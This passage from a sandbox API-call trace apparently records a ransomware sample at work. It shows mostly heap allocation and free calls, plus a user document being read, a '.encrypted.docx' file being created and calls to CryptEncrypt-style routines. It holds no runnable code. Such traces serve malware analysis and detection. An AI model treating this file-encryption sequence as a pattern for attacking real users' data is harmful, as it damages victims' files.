Flags=0x0, Size=0x8) returned 0x7da318 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0035.308] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\yjepcpmz.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.309] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.309] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0035.309] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.309] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.310] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.310] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xaafb, lpOverlapped=0x0) returned 1 [0035.312] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaafb) returned 0x955018 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaafb) returned 0x95fb20 [0035.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.316] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaafb) returned 0x955018 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.317] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.317] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.317] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaafb) returned 0x955018 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0035.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaafb) returned 0x96a628 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.319] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.320] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.320] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.320] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.321] 